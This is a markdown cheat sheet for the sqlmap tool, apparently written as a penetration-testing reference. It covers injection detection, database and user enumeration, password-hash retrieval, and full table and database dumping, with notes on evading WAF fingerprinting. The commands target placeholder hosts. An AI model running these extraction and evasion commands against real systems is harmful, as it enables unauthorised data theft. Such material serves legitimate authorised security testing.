sqlmap-cheat-sheet-sql-injection-testing-data-extraction.md (19414B)
1 --- 2 title: "sqlmap Cheat Sheet - SQL Injection Testing & Data Extraction" 3 description: "sqlmap -u \"http://target.com/page.php?id=1\"" 4 category: exploitation 5 tags: ["exploitation", "sql-injection"] 6 tools: ["Hashcat", "John", "SQLMap"] 7 difficulty: intermediate 8 updated: "2026-08-10" 9 source: "vault:Exploitation/sqlmap Cheat Sheet - SQL Injection Testing & Data Extraction.md" 10 --- 11 # Basic GET parameter test 12 sqlmap -u "http://target.com/page.php?id=1" 13 ``` 14 *Tests the `id` parameter for SQL injection using default detection techniques* 15 16 ```bash 17 # Non-interactive mode (auto-answer prompts) 18 sqlmap -u "http://target.com/page.php?id=1" --batch 19 ``` 20 *Automatically accepts default answers to all prompts for unattended scanning* 21 22 ```bash 23 # POST data test 24 sqlmap -u "http://target.com/login.php" --data="username=admin&password=test" --batch 25 ``` 26 *Tests POST parameters in request body (common for login forms)* 27 28 ```bash 29 # Cookie-based test (requires --level 2+) 30 sqlmap -u "http://target.com/dashboard.php" --cookie="PHPSESSID=abc123; user=admin" --level=2 --batch 31 ``` 32 *Tests cookie values for SQL injection (requires elevated test level)* 33 34 ```bash 35 # Test from Burp request file 36 sqlmap -r request.txt --batch 37 ``` 38 *Loads full HTTP request from file (preserves headers, body, method)* 39 40 ```bash 41 # Test specific parameter only 42 sqlmap -u "http://target.com/page.php?id=1&name=test" -p id --batch 43 ``` 44 *Focuses testing on the `id` parameter, ignoring `name`* 45 46 --- 47 48 ### Options & Flags 49 50 | Flag | Purpose | 51 |:---|:---| 52 | **-u URL** | Target URL with parameters | 53 | **--data="param=val¶m2=val2"** | POST body data | 54 | **--cookie="name=value; name2=value2"** | Cookie values (semicolon separator) | 55 | **-p PARAM** | Test only this parameter | 56 | **-r FILE** | Load HTTP request from file (e.g., from Burp) | 57 | **--batch** | Never ask for user input (accept defaults) | 58 | **--level=N** | Test depth 1–5 (default 1; cookies at 2+, User-Agent/Referer at 3+) | 59 | **--risk=N** | Payload aggressiveness 1–3 (default 1; higher = more destructive/false positives) | 60 | **--technique=BEUST** | Limit injection techniques (B=boolean-blind, E=error, U=union, S=stacked, T=time-blind, Q=inline) | 61 | **--random-agent** | Randomise User-Agent header | 62 | **--threads=N** | Concurrent requests (default 1) | 63 | **--dbms=DBMS** | Force DBMS type (MySQL, PostgreSQL, MSSQL, Oracle, etc.) | 64 | **--flush-session** | Ignore saved session data, start fresh | 65 | **--parse-errors** | Display DBMS error messages from responses | 66 | **-t FILE** | Log all HTTP traffic to file | 67 68 --- 69 70 ### Practical Examples 71 72 ```bash 73 # Quick GET test with auto-defaults 74 sqlmap -u "http://example.com/product.php?id=5" --batch 75 ``` 76 *Standard automated scan with default settings* 77 78 ```bash 79 # POST login form test, faster with threads 80 sqlmap -u "http://example.com/login.php" --data="user=admin&pass=1234" --batch --threads=5 81 ``` 82 *Accelerates testing using 5 concurrent threads* 83 84 ```bash 85 # Cookie test with increased level and risk 86 sqlmap -u "http://example.com/dashboard.php" --cookie="sessionid=xyz789" --level=3 --risk=2 --batch 87 ``` 88 *Deeper testing including User-Agent/Referer headers with more aggressive payloads* 89 90 ```bash 91 # Test from Burp capture, limit to UNION/error techniques 92 sqlmap -r burp_request.txt --technique=UE --batch 93 ``` 94 *Faster testing by excluding time-based blind techniques* 95 96 ```bash 97 # Force MySQL DBMS, randomise User-Agent 98 sqlmap -u "http://example.com/search.php?q=test" --dbms=MySQL --random-agent --batch 99 ``` 100 *Skips DBMS fingerprinting and evades basic User-Agent filtering* 101 102 ```bash 103 # Test only 'id' parameter, exclude time-based (faster) 104 sqlmap -u "http://example.com/item.php?id=10&cat=2" -p id --technique=BEU --batch 105 ``` 106 *Targeted test on single parameter without slow time-based blind payloads* 107 108 --- 109 110 ### Output Interpretation 111 112 | Output | Meaning | 113 |:---|:---| 114 | **parameter 'X' is vulnerable** | SQL injection confirmed in parameter X | 115 | **parameter appears to be injectable** | High confidence of vulnerability | 116 | **Injection type** | Boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries | 117 | **DBMS fingerprint** | MySQL 5.x, PostgreSQL 9.x, MSSQL 2012, etc. | 118 | **Payload** | Successful injection payload displayed | 119 | **all tested parameters do not appear to be injectable** | No vulnerability detected; try `--level=5 --risk=3` | 120 | **Session saved** | Results cached; re-run skips already-tested parameters unless `--flush-session` used | 121 | **Output location** | Results saved to `~/.local/share/sqlmap/output/` (newer Kali) or `~/.sqlmap/output/` (older Kali) | 122 123 --- 124 125 ### OPSEC & Detection Considerations 126 127 1. **High request volume**: sqlmap generates numerous requests, easily detected by IDS/IPS/WAF 128 2. **User-Agent signature**: Default `sqlmap/1.x` header is fingerprinted by WAFs; use `--random-agent` 129 3. **Time-based blind delays**: Causes deliberate 5–10 sec delays per test; use `--technique=BEU` to exclude 130 4. **Log traces**: Visible in web server access logs, application logs, database logs, WAF/SIEM alerts 131 5. **Obvious SQL patterns**: Payloads contain `' OR 1=1`, `UNION SELECT`, `SLEEP()` signatures 132 6. **No stealth mode**: Use `--delay`, `--threads=1`, `--random-agent` for basic noise reduction (still detectable) 133 134 --- 135 136 ### Common Errors & Solutions 137 138 | Error | Solution | 139 |:---|:---| 140 | **unable to connect to target URL or proxy** | Check network; WAF may be blocking; try `--random-agent`, `--delay=2` | 141 | **parameter appears to be not injectable** | Increase detection: `--level=5 --risk=3`; try specific `--technique`; verify manually | 142 | **all tested parameters do not appear to be injectable** | Increase `--level` and `--risk`; check for WAF; try `--tamper` scripts | 143 | **connection timed out** | Use `--timeout=30`, `--retries=3`, `--technique=BEU`, `--threads=1`, `--disable-precon` | 144 | **heuristic test shows parameter might not be injectable** | Warning only; sqlmap continues testing; safe to ignore if parameter is vulnerable | 145 146 --- 147 148 ### Version & Platform Notes 149 150 1. Kali Linux ships with sqlmap 1.9+ (stable as of Jan 2025) 151 2. Update: `sudo apt update && sudo apt install sqlmap` 152 3. Run as: `sqlmap` (no `python sqlmap.py` needed on Kali) 153 4. Cookie testing requires `--level=2` minimum 154 5. User-Agent/Referer testing requires `--level=3` 155 6. Python 2.x support deprecated but still works; Python 3.x recommended 156 157 --- 158 159 ## sqlmap Database Enumeration 160 161 **Purpose**: Enumerate databases, current DB, current user, DBMS version/banner after SQL injection is confirmed 162 163 **Prerequisites**: 164 1. SQL injection already identified (run detection first) 165 2. sqlmap session saved (or re-run with injection URL) 166 3. Network access to target 167 4. Authorised testing scope 168 169 --- 170 171 ### Core Commands 172 173 ```bash 174 # List all databases 175 sqlmap -u "http://target.com/page.php?id=1" --dbs --batch 176 ``` 177 *Retrieves names of all accessible databases on DBMS* 178 179 ```bash 180 # Show current database 181 sqlmap -u "http://target.com/page.php?id=1" --current-db --batch 182 ``` 183 *Identifies which database the application is currently using* 184 185 ```bash 186 # Show current user 187 sqlmap -u "http://target.com/page.php?id=1" --current-user --batch 188 ``` 189 *Reveals DBMS user account running the queries* 190 191 ```bash 192 # List all database users 193 sqlmap -u "http://target.com/page.php?id=1" --users --batch 194 ``` 195 *Enumerates all DBMS user accounts* 196 197 ```bash 198 # Retrieve DBMS banner 199 sqlmap -u "http://target.com/page.php?id=1" --banner --batch 200 ``` 201 *Obtains DBMS version and build information* 202 203 ```bash 204 # List tables in specific database 205 sqlmap -u "http://target.com/page.php?id=1" -D database_name --tables --batch 206 ``` 207 *Shows all tables within specified database* 208 209 ```bash 210 # List columns in specific table 211 sqlmap -u "http://target.com/page.php?id=1" -D database_name -T table_name --columns --batch 212 ``` 213 *Retrieves column names and data types for specified table* 214 215 ```bash 216 # Exclude system databases from enumeration 217 sqlmap -u "http://target.com/page.php?id=1" --dbs --exclude-sysdbs --batch 218 ``` 219 *Filters out `information_schema`, `mysql`, `sys`, `performance_schema`* 220 221 --- 222 223 ### Options & Flags 224 225 | Flag | Purpose | 226 |:---|:---| 227 | **--dbs** | Enumerate all databases | 228 | **--current-db** | Retrieve current database name | 229 | **--current-user** | Retrieve current DBMS user | 230 | **--users** | Enumerate all DBMS users | 231 | **--passwords** | Enumerate password hashes for users | 232 | **--privileges** | Enumerate user privileges | 233 | **--banner** | Retrieve DBMS version banner | 234 | **-D DATABASE** | Specify target database | 235 | **--tables** | Enumerate tables (requires `-D`) | 236 | **-T TABLE** | Specify target table | 237 | **--columns** | Enumerate columns (requires `-D` and `-T`) | 238 | **--exclude-sysdbs** | Skip system databases | 239 | **--schema** | Enumerate entire DBMS schema | 240 | **--count** | Retrieve row count for table | 241 | **-a** or **--all** | Retrieve everything (very slow) | 242 243 --- 244 245 ### Practical Examples 246 247 ```bash 248 # Full enumeration workflow: databases → tables → columns 249 sqlmap -u "http://example.com/product.php?id=5" --dbs --batch 250 sqlmap -u "http://example.com/product.php?id=5" -D webapp --tables --batch 251 sqlmap -u "http://example.com/product.php?id=5" -D webapp -T users --columns --batch 252 ``` 253 *Standard three-step reconnaissance process* 254 255 ```bash 256 # Quick context: current DB and user 257 sqlmap -u "http://example.com/product.php?id=5" --current-db --current-user --batch 258 ``` 259 *Fast initial reconnaissance of application database context* 260 261 ```bash 262 # List only user-created databases (exclude system DBs) 263 sqlmap -u "http://example.com/product.php?id=5" --dbs --exclude-sysdbs --batch 264 ``` 265 *Focuses on application databases, ignoring DBMS internals* 266 267 ```bash 268 # Enumerate users and their privileges 269 sqlmap -u "http://example.com/product.php?id=5" --users --privileges --batch 270 ``` 271 *Identifies potential privilege escalation paths* 272 273 ```bash 274 # Get DBMS version and current database 275 sqlmap -u "http://example.com/product.php?id=5" --banner --current-db --batch 276 ``` 277 *Combined fingerprinting and context gathering* 278 279 ```bash 280 # Count rows in 'orders' table before dumping 281 sqlmap -u "http://example.com/product.php?id=5" -D webapp -T orders --count --batch 282 ``` 283 *Assesses data volume before committing to full extraction* 284 285 --- 286 287 ### Output Interpretation 288 289 | Output | Meaning | 290 |:---|:---| 291 | **Databases** | List of database names (e.g., `information_schema`, `mysql`, `webapp`, `testdb`) | 292 | **Current DB** | Single database name the application uses (e.g., `webapp`) | 293 | **Current user** | DBMS user running queries (e.g., `webapp_user@localhost`, `root@%`) | 294 | **Tables** | List of table names in specified database | 295 | **Columns** | Column names with data types (e.g., `id INT`, `username VARCHAR(50)`, `password_hash CHAR(64)`) | 296 | **Users** | DBMS user accounts (e.g., `root`, `admin`, `webapp_user`) | 297 | **Privileges** | User permissions (e.g., `SELECT`, `INSERT`, `FILE`, `SUPER`) | 298 | **Banner** | DBMS version (e.g., `MySQL 5.7.33-0ubuntu0.16.04.1`) | 299 | **Row count** | Number of rows in table (e.g., `12,543 entries`) | 300 301 --- 302 303 ### OPSEC & Detection Considerations 304 305 1. **High query volume**: Each enumeration step generates multiple queries; logged in DB and web server 306 2. **Enumeration queries stand out**: `SELECT schema_name FROM information_schema.schemata`, `SHOW TABLES`, etc. are obvious reconnaissance 307 3. **Time-based enumeration slowest**: Can take minutes per table; use `--technique=BEU` to exclude time-based 308 4. **System DB enumeration**: Querying `information_schema`, `mysql`, `sys` generates alerts in mature SOCs 309 5. **Repeated session reuse**: sqlmap saves session; re-running doesn't re-test injection but still generates enumeration traffic 310 311 --- 312 313 ### Common Errors & Solutions 314 315 | Error | Solution | 316 |:---|:---| 317 | **unable to retrieve tables for database 'X'** | Insufficient privileges; try different database or check `--privileges` | 318 | **unable to retrieve column names for table 'X'** | Table may not exist or access denied; verify with `--tables` first | 319 | **Session confusion** | Use `--flush-session` to start fresh | 320 | **Timeout during enumeration** | Use `--threads=1`, `--technique=BEU`, `--timeout=30` for unstable connections | 321 | **No results for --current-db** | Injection may be blind and slow; wait or try `--technique=U` (UNION-based is faster) | 322 323 --- 324 325 ### Version & Platform Notes 326 327 1. Enumeration syntax consistent across sqlmap 1.x versions 328 2. DBMS-specific differences: MySQL uses `information_schema`, MSSQL uses `sysobjects`, PostgreSQL uses `pg_catalog`; sqlmap handles automatically 329 3. Column data types vary by DBMS (e.g., MySQL `VARCHAR`, PostgreSQL `CHARACTER VARYING`, MSSQL `NVARCHAR`) 330 331 --- 332 333 ## sqlmap Table Dumping & Data Extraction 334 335 **Purpose**: Extract data (rows, columns, tables) from target database after enumeration 336 337 **Prerequisites**: 338 1. SQL injection confirmed 339 2. Database and table names known (from enumeration phase) 340 3. Sufficient DBMS privileges (typically `SELECT`) 341 4. Network access and authorised scope 342 343 --- 344 345 ### Core Commands 346 347 ```bash 348 # Dump entire table 349 sqlmap -u "http://target.com/page.php?id=1" -D database_name -T table_name --dump --batch 350 ``` 351 *Extracts all rows and columns from specified table* 352 353 ```bash 354 # Dump specific columns only 355 sqlmap -u "http://target.com/page.php?id=1" -D database_name -T table_name -C column1,column2 --dump --batch 356 ``` 357 *Selective extraction (comma-separated, no spaces)* 358 359 ```bash 360 # Dump first 100 rows 361 sqlmap -u "http://target.com/page.php?id=1" -D database_name -T table_name --dump --start=0 --stop=100 --batch 362 ``` 363 *Paginated extraction (0-indexed, exclusive stop)* 364 365 ```bash 366 # Dump rows matching condition 367 sqlmap -u "http://target.com/page.php?id=1" -D database_name -T table_name --dump --where="id>1000" --batch 368 ``` 369 *Conditional extraction using SQL WHERE clause* 370 371 ```bash 372 # Dump all tables in database 373 sqlmap -u "http://target.com/page.php?id=1" -D database_name --dump --batch 374 ``` 375 *Extracts entire database (can be very slow)* 376 377 ```bash 378 # Dump all databases (extremely slow) 379 sqlmap -u "http://target.com/page.php?id=1" --dump-all --exclude-sysdbs --batch 380 ``` 381 *Complete data exfiltration excluding system databases* 382 383 --- 384 385 ### Options & Flags 386 387 | Flag | Purpose | 388 |:---|:---| 389 | **--dump** | Extract data from table(s) | 390 | **-D DATABASE** | Specify database (required) | 391 | **-T TABLE** | Specify table (required unless dumping all) | 392 | **-C COL1,COL2** | Dump only specified columns (comma-separated, no spaces) | 393 | **--start=N** | First row to dump (0-indexed) | 394 | **--stop=N** | Last row to dump (exclusive) | 395 | **--first=N** | First character to retrieve per column entry | 396 | **--last=N** | Last character to retrieve per column entry | 397 | **--where="condition"** | SQL WHERE clause for conditional dump (e.g., `"id>100"`, `"date>'2024-01-01'"`) | 398 | **--dump-all** | Dump entire DBMS (all databases and tables) | 399 | **--exclude-sysdbs** | Skip system databases when using `--dump-all` | 400 | **--dump-format=FORMAT** | Output format: `CSV` (default), `HTML`, `SQLITE` | 401 | **--count** | Get row count before dumping | 402 | **--output-dir=DIR** | Custom output directory | 403 404 --- 405 406 ### Practical Examples 407 408 ```bash 409 # Dump 'users' table from 'webapp' database 410 sqlmap -u "http://example.com/product.php?id=5" -D webapp -T users --dump --batch 411 ``` 412 *Standard full table extraction* 413 414 ```bash 415 # Dump only 'username' and 'email' columns 416 sqlmap -u "http://example.com/product.php?id=5" -D webapp -T users -C username,email --dump --batch 417 ``` 418 *Targeted extraction minimising data exfiltration footprint* 419 420 ```bash 421 # Dump first 50 users 422 sqlmap -u "http://example.com/product.php?id=5" -D webapp -T users --dump --start=0 --stop=50 --batch 423 ``` 424 *Quick sample of table contents* 425 426 ```bash 427 # Dump admin users only (conditional) 428 sqlmap -u "http://example.com/product.php?id=5" -D webapp -T users --dump --where="role='admin'" --batch 429 ``` 430 *Filtered extraction based on column value* 431 432 ```bash 433 # Count rows before dumping large table 434 sqlmap -u "http://example.com/product.php?id=5" -D webapp -T logs --count --batch 435 sqlmap -u "http://example.com/product.php?id=5" -D webapp -T logs --dump --start=0 --stop=1000 --batch 436 ``` 437 *Assessment before committing to extraction* 438 439 ```bash 440 # Dump all user-created databases (exclude system DBs, very slow) 441 sqlmap -u "http://example.com/product.php?id=5" --dump-all --exclude-sysdbs --batch 442 ``` 443 *Complete data exfiltration (can take hours)* 444 445 --- 446 447 ### Output Interpretation 448 449 | Output | Meaning | 450 |:---|:---| 451 | **Dumped data location** | `~/.local/share/sqlmap/output/<target>/dump/` (Kali Linux) | 452 | **CSV format** | Default; files named `<database>/<table>.csv` | 453 | **Console output** | sqlmap prints table to terminal in ASCII table format | 454 | **Empty results** | Table may be empty or WHERE condition matches no rows | 455 | **Partial dumps** | `--start`/`--stop` limits shown; re-run with different ranges for more data | 456 | **Password hashes** | sqlmap automatically detects hashes and offers to crack | 457 | **Row count** | `Table 'users' dumped to CSV file (42 entries)` indicates number of rows extracted | 458 459 --- 460 461 ### OPSEC & Detection Considerations 462 463 1. **Extremely noisy**: Dumping generates hundreds to thousands of queries per table 464 2. **Data exfiltration signatures**: Large `SELECT` result sets trigger DLP/SIEM alerts 465 3. **Time-based blind slowest**: Can take hours for large tables; exclude with `--technique=BEU` 466 4. **Logs everywhere**: Web server access logs, application logs, database query logs, network traffic captures 467 5. **Automated cracking prompts**: sqlmap detects password hashes and asks to crack; answer `N` to skip or use `--batch` 468 6. **No stealth mode**: sqlmap prioritises speed over stealth; data extraction is inherently detectable 469 470 --- 471 472 ### Common Errors & Solutions 473 474 | Error | Solution | 475 |:---|:---| 476 | **unable to retrieve entries for table 'X'** | Access denied or table doesn't exist; verify with `--tables` and check `--privileges` | 477 | **connection reset by peer during dump** | Large result set or unstable connection; use `--threads=1`, dump in chunks with `--start`/`--stop` | 478 | **Timeout errors on large tables** | Use `--timeout=60`, `--technique=BEU`, dump in smaller chunks | 479 | **Out-of-memory errors** | Dumping millions of rows; use `--start`/`--stop` to paginate | 480 | **WHERE clause syntax errors** | Use single quotes inside double quotes: `--where="name='admin'"` (not `--where='name="admin"'`) | 481 | **No output for --dump** | Check `--count` first to verify rows exist; verify `-D` and `-T` are correct | 482 483 --- 484 485 ### Version & Platform Notes 486 487 1. sqlmap 1.9+ (Jan 2025) default output: `~/.local/share/sqlmap/output/` on Kali Linux 488 2. Older versions: `~/.sqlmap/output/` 489 3. CSV format default; HTML/SQLITE available with `--dump-format` 490 4. Password hash cracking requires separate tools ([hashcat](https://hashcat.net/hashcat/), [John the Ripper](https://www.openwall.com/john/)); sqlmap detects but doesn't crack inline by default in `--batch` mode 491 492 --- 493 494 ## References 495 496 1. [sqlmap GitHub Repository](https://github.com/sqlmapproject/sqlmap) 497 2. [sqlmap Official Website](https://sqlmap.org) 498 3. [sqlmap Usage Wiki](https://github.com/sqlmapproject/sqlmap/wiki/Usage) 499 4. [sqlmap Features Documentation](https://github.com/sqlmapproject/sqlmap/wiki/Features) 500 5. [Burp Suite](https://portswigger.net/burp) 501 6. [hashcat](https://hashcat.net/hashcat/) 502 7. [John the Ripper](https://www.openwall.com/john/) 503 504 --- 505 506 #sqlmap #SQLi #WebAppSec #DatabaseEnum #DataExfiltration #PenetrationTesting #Kali #SQLInjection #AutomatedTesting